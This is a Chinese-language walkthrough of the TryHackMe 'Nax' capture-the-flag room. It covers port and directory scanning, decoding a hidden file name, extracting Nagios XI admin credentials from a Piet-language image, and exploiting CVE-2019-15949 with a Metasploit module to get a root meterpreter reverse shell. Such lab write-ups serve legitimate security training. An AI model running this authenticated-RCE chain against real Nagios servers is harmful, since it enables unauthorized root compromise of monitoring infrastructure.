首页 > 其他分享 >【THM】Nax练习

【THM】Nax练习

时间:2024-10-05 15:47:18浏览次数:8  
标签:找到 第一步 练习 程序 tcp 漏洞 THM Nax 我们

【THM】Nax练习

与本文相关的TryHackMe实验房间链接:TryHackMe | Nax

简介:识别市场上最强大、最可信的网络监控软件中的关键安全缺陷,该软件允许用户通过身份验证执行远程代码执行。

img

你能完成这个挑战吗?

注意:这个房间需要Metasploit 6

image-20241005140410631

第一题:你找到了什么隐藏的文件?

第一步

端口扫描

首先使用nmap对端口进行扫描

nmap -Pn -sV -T4 10.10.179.36

image-20241005140641655

可以发现目标开放了5个端口:22/tcp ssh服务、25/tcp smtp服务、80/tcp http服务、389/tcp ldap服务、443/tcp ssl服务

第二步

访问网站

我们先进入网站看看界面

image-20241005141226912

第三步

信息收集

网页源码没有什么东西,我们试着进行目录扫描

gobuster dir -u http://10.10.179.36/ -w /root/Filenames_or_Directories_All.txt 

image-20241005145247469

我们尝试访问index.php

image-20241005145334063

Nagios XI 是一款强大的监控解决方案,用于监控 IT 基础设施的各个方面,包括服务器、网络设备、应用程序和服务

第四步

已有信息分析

我们先进入网站看看界面

除了一个貌似蝴蝶的图标,网页给出了线索:元素周期表中的化学元素

Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr

这里需要CTF杂项题的思维,我们通过密文找出明文

按照元素周期表序号列出来:

47 80 73 51 84 46 80 78 103

我们尝试ascii解码:

image-20241005141536264

这下我们找到了隐藏的文件

image-20241005141613014

第二题:谁是这个文件的作者?

第一步

下载文件

我们访问/PI3T.PNg并下载文件

image-20241005141830142

第二步

查看图片属性

我们得到一张图片,我们首先查看这张图片的属性:

exiftool PI3T.PNg

image-20241005143107435

我们可以发现Artist和Copyright两栏的作者都是Piet Mondrian

image-20241005143206689

(如果您在下载的图像上运行该工具时遇到有关未知 ppm 格式的错误 -- 请使用 gimp 或其他绘画程序打开它并导出为 ppm 格式,然后重试!)

第三题:你找到的用户名是什么?

第一步

分析图片

这张图片其实是一种编程语言,名为NPIET

NPIET 是一种以图像为基础的编程语言,其命令通过图像中的像素颜色和排列来表示。程序在一个点阵图上执行,像素的颜色变化代表不同的操作。这种语言的设计旨在将程序的可视化和艺术性结合,通常用于创作复杂的视觉艺术作品,而非传统的编程任务。

我们可以在这个网站中运行NPIET语言

npiet - an interpreter and editor for the piet programming language (bertnase.de)

image-20241005143854580

网站会为我们执行以下命令:

npiet -w -e 220000 PI3T.PNg

-w 这个选项通常表示以“宽模式”运行,具体的效果可能依赖于 NPIET 的实现,通常是处理更复杂的程序或图像

-e 220000 这个选项通常用来设置程序的执行时间或执行次数,220000 可能表示最大执行步骤数。

我们过滤分析一下得出:

nagiosadmin%n3p3UQ&9BjLp4$7uhWdY

看上去像是存储密码的hash,我们得到了用户名nagiosadmin

image-20241005144227353

第四题:你找到的密码是什么?

第一步

分析密码

我以为这是hash加密,于是尝试解密但是失败了,看了下题目的提示:

image-20241005145927705

也就是说我们找到的密码就是n3p3UQ&9BjLp4$7uhWdY

image-20241005145959176

第六题:此漏洞的 CVE 编号是多少?格式为:CVE-0000-0000

第一步

登录进后台

使用前两题的账号密码尝试登录进Nagios后台:

image-20241005150328319

第二步

通过版本在漏洞库中搜寻

image-20241005150422763

image-20241005151027146

尝试后发现了正确的:

image-20241005151128923

image-20241005151158211

第七题:在Metasploit启动后,让我们使用命令search applicationame搜索我们的目标漏洞攻击程序。漏洞攻击模块的完整路径(从exploit开始)是什么?

第一步

启动matasploit

现在我们已经找到了漏洞,让我们来寻找漏洞攻击程序。

在本节内容中,我们将使用与此漏洞攻击程序相关的Metasploit模块。让我们继续使用命令msfconsole启动Metasploit。

我们对漏洞编号进行搜索:

search 48191

image-20241005151719987

找不到,我们搜索CVE:

search 2019-15949

image-20241005151757573

Name栏下面的即是漏洞攻击模块的完整路径

image-20241005151905836

第八题:破解机器并找到user.txt

第一步

利用漏洞

输入以下命令使用这个漏洞库中的漏洞:

use 0

image-20241005152030243

我们使用以下命令来进入漏洞利用的设置选项

options

image-20241005152053864

发现我们需要设置的参数有:PASSWORD、RHOST、LHOST,我们进行设置

set PASSWORD n3p3UQ&9BjLp4$7uhWdY
set RHOST 10.10.179.36
set LHOST 10.10.18.161

image-20241005152417233

设置好后直接运行:

run

image-20241005152512823

第二步

获取本地shell

现在我们得到了一个meterpreter shell,我们输入shell获取本地shell

image-20241005152652025

可以发现我们现在是root了,我们寻找user.txt(一般在home中的用户根目录中)

image-20241005152754012

image-20241005152818242

第九题:找到root.txt

在/root目录中找到了

image-20241005152922492

image-20241005152939300

标签:找到,第一步,练习,程序,tcp,漏洞,THM,Nax,我们
From: https://www.cnblogs.com/handsomexuejian/p/18447883

相关文章

  • C++-练习-52
    题目:这个练习让您编写处理数组和结构的函数,下面是程序的框架,请提供其中描述的函数,以完成该程序#include<iostream>usingnamespacestd;constintSLEN=30;structstudent{charfullname[SLEN];charhobby[SLEN];intooplevel;}; intgetinfo(studentpa[],i......
  • 【THM】Res练习
    【THM】Res练习与本文相关的TryHackMe实验房间链接:TryHackMe|Res简介:在这个半引导式挑战中,使用内存中的数据结构入侵易受攻击的数据库服务器!你准备好接受挑战了吗?第一题:扫描机器,有多少端口是开放的?第一步端口扫描首先使用nmap对端口进行扫描nmap-sV-sC-p-10.10......
  • VulnHub2018_DeRPnStiNK靶机渗透练习
    据说该靶机有四个flag扫描扫描附近主机arp-scan-l扫主目录扫端口nmap-sS-sV-n-T4-p-192.168.xx.xx结果如下StartingNmap7.94SVN(https://nmap.org)at2024-09-3019:25CSTNmapscanreportfor192.168.93.131Hostisup(0.0024slatency).Notshown:......
  • Java面向对象第四章方法重写与多态练习题
    练习1:使用重写优化电子宠物系统需求说明使用方法重写优化电子宠物系统,实现如下效果 packagecom.hz.ch02;/***猫类*@author26255**/publicclassCatextendsFather{ privateStringsex; publicCat(Stringname,inthealth,intlove,Stringse......
  • 【THM】Git Happens练习
    【THM】GitHappens练习与本文相关的TryHackMe实验房间链接:TryHackMe|GitHappens简介:老板让我创建一个原型代码,所以它就在这里!我们甚至使用了一种叫做“版本控制”的东西,使部署变得非常容易!你能找到应用程序的密码吗?第一题:找到超级机密的密码第一步端口扫描首先使......
  • Study Plan For Algorithms - Part48
    1.不同的二叉搜索树II给定一个整数n,请生成并返回所有由n个节点组成且节点值从1到n互不相同的不同二叉搜索树。classSolution:defgenerateTrees(self,n:int)->List[Optional[TreeNode]]:ifn==0:return[]returnself.g......
  • 推荐几个好用的电脑打字练习软件
    前言亲爱的朋友们,如果你是打字世界的初来乍到者,或是正寻找提升打字技能,那么请允许我诚挚地向你推荐四款超棒的在线打字练习宝藏地。打字练习软件“巧手打字通”(laidazi.com):这简直是为打字新手和中小学生们量身定制的温馨小屋。它不仅紧扣学校语文和英语的教材精髓,设计......
  • 鹏哥C语言62---第9次作业:函数递归练习
    #define_CRT_SECURE_NO_WARNINGS#include<stdio.h>#include<string.h>//-------------------------------------------------------------------------------------------第九次作业 函数递归等//----------------------------------------------------------------......
  • Springboot 练习
        Springboot练习——分页查询    Emp类packagecom.wzb.pojo20240930;importlombok.AllArgsConstructor;importlombok.Data;importlombok.NoArgsConstructor;importjava.time.LocalDate;importjava.time.LocalDateTime;@Data@NoArgsConst......
  • MySQL之数据表,数据类型,表约束类型的指令讲解和练习
        本篇博客主要用来记录和分享本人学习MySQL数据库的基本操作指令的笔记和心得,包括数据表操作、数据管理、数据类型的讲解以及表的约束。通过实际的示例和注意事项,帮助大家更好地理解和应用这些知识。一、数据表操作指令1.创建数据表使用CREATETABLE指令可以创......